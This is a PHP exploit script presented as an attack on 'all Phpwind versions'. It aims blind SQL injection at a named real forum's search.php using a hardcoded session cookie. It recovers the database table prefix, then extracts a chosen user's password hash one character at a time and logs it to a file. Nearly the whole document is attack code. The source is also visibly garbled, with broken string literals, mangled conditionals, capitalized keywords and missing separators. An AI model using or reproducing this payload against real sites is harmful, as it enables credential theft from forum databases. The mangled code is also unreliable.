<meta http-equiv= "Content-type" content= "text/html; charset=gb2312 ">
<title>codz by Jian Xin </title>
<style type= "Text/css" >
BODY,TD {
font-family: "Tahoma";
Font-size: "12px";
Line-height: "150%";
}
. smlfont {
font-family: "Tahoma";
Font-size: "11px";
}
. INPUT {
Font-size: "12px";
COLOR: "#000000";
Background-color: "#FFFFFF";
Height: "18px";
border: "1px solid #666666";
Padding-left: "2px";
}
. redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
Color: "#000000";
Text-decoration:underline;
}
a:hover {
Color: "#465584";
Text-decoration:none;
}
. Top {background-color: "#CCCCCC"}
. firstalt {background-color: "#EFEFEF"}
. secondalt {background-color: "#F5F5F5"}
</style>
<center>the Exploiet of the all Phpwind version</center>
<center> by Sword Heart </center>
<br>
<br>
<br>
<br>
<br>
<?php
Ini_set ("Max_execution_time", 0);
Error_reporting (7);
$path = "/search.php";
$server = ' bbs.ccidnet.com ';
$cookie = ' lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%b1%b1%be%a9%ca%d0%b7%bd%d5%fd%bf%ed%b4%f8%0d; lastvisit=0%091161077981%09%2fsearch.php%3f; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; Phpsessid=3b11a9ca33071f0b06c9aab0995918a7; Cknum=bljquwzsvgtxaz9sbfeawgtdu1nxuanswaefdfnqvvydua1qb1ttuqahvae%3d ';
$useragent = "mozilla/4.0" (compatible; MSIE 6.0; Windows NT 5.1; SV1. NET CLR 2.0.50727;. NET CLR 1.1.4322) ";
$uid = 2;
$_get[' uid ']&& $uid =$_get[' uid '];
$tid = 539264;
$mask = ' No matching content found ';
$count = 0;
$testing = 1;
$testing =$_get[' test '];
if ($testing) {Preg_match ('/x-powered-by:php\/(. +) \r\n/ie ', Send (""), $php); echo$php[1];d ie ();
$debug = 1;
$temp =md5 (rand (1,100) +microtime ());
$cmd = "step=3&pwuser=". $temp. " Loveshell "." &uids=-1 ". $sql." /*J&184288238=KKKK&276791066=JJJJJJ ";
$response =send ($cmd);
Preg_match ('/from (. +) threads/ie ', $response, $match);
$pre = $match [1];
if ($match [1]) echo ' Good job! Wo Got the pre: <font color=red> '. $match [1]. " </font><br> ";
else if (Strpos ($response, ' value= ' login ')) die ("You Are not login! Try to get Anthor Cookie and Useragen value!<br> ");
else {echo "Maybe It is not vul!<br>";d ie ();}
echo "Try to get" the uid= $uid ' s password:<font color=red>;
$log =fopen (' Log.txt ', ' A + ');
For ($i =0 $i <16; $i + +)
{
$type = 0;
$sub = $i +9;
$temp =md5 (rand (1,100) +microtime ());
$sql = "Union select $tid from". $pre. " Members where uid= $uid and Ord (Mid (password, $sub, 1)) >47 and Ord (Mid (password, $sub, 1)) <58 ";
$sql =urlencode ($sql);
$temp =md5 (rand (1,100) +microtime ());
$cmd = "step=3&pwuser=". $temp. " Loveshell "." &uids=-1) ". $sql." /*.&184288238=KKKK&276791066=JJJJJJ ";
if (send ($cmd), $mask)) {!strpos
$type = 0;
For ($m =48 $m <=57; $m + +) {
$temp =md5 (rand (1,100) +microtime ());
$sql = "Union select $tid from". $pre. " Members where uid= $uid and Ord (Mid (password, $sub, 1)) = $m ";
$sql =urlencode ($sql);
$temp =md5 (rand (1,100) +microtime ());
$cmd = "step=3&pwuser=". $temp. " Loveshell "." &uids=-1) ". $sql." /*.&184288238=KKKK&276791066=JJJJJJ ";
if (send ($cmd), $mask)) {!strpos
echo Chr ($m);
Fputs ($log, Chr ($m));
Break
}
Continue
}
Continue
}
$sql = "Union select $tid from". $pre. " Members where uid= $uid and Ord (Mid (password, $sub, 1)) >96 and Ord (Mid (password, $sub, 1)) <123 ";
$sql =urlencode ($sql);
$temp =md5 (rand (1,10000) +microtime ());
$cmd = "step=3&pwuser=". $temp. " Loveshell "." &uids=-1) ". $sql." /*.&184288238=KKKK&276791066=JJJJJJ ";
if (send ($cmd), $mask)) {!strpos
$type = 1;
For ($m =97 $m <=122; $m + +) {
$temp =md5 (rand (1,100) +microtime ());
$sql = "Union select $tid from". $pre. " Members where uid= $uid and Ord (Mid (password, $sub, 1)) = $m ";
$sql =urlencode ($sql);
$temp =md5 (rand (1,100) +microtime ());
$cmd = "step=3&pwuser=". $temp. " Loveshell "." &uids=-1) ". $sql." /*.&184288238=KKKK&276791066=JJJJJJ ";
if (send ($cmd), $mask)) {!strpos
echo Chr ($m);
Fputs ($log, Chr ($m));
Break
}
Continue
}
Continue
}
echo "Error!<br>";
Die ("shit! May are the data you are not valid! Try anthor uid\r\n ");
}
Fclose ($log);
echo "<br>done! We Post $count times!<br> ";
function Send ($cmd)
{
Global $path, $server, $cookie, $count, $useragent, $debug;
$count = $count +1;
$message = "POST". $path. "? Http/1.1\r\n ";
$message. = "Accept: */*\r\n";
$message. = "accept-language:zh-cn\r\n";
$message. = "referer:http://". $server. $path. " \ r \ n ";
$message. = "content-type:application/x-www-form-urlencoded\r\n";
$message. = "User-agent:". $useragent. " \ r \ n ";
$message. = "Host:". $server. " \ r \ n ";
$message. = "Content-length:". strlen ($cmd). \ r \ n ";
$message. = "connection:keep-alive\r\n";
$message. = "Cookie:". $cookie. " \ r \ n ";
$message. = "\ r \ n";
$message. = $cmd. " \ r \ n ";
$FD = Fsockopen ($server, 80);
Fputs ($FD, $message);
$resp = "<pre>";
while ($FD &&!feof ($FD)) {
$resp. = Fread ($FD, 1024);
}
Fclose ($FD);
$resp. = "</pre>";
if ($debug) {echo $cmd; echo $resp;}
return $RESP;
}
?>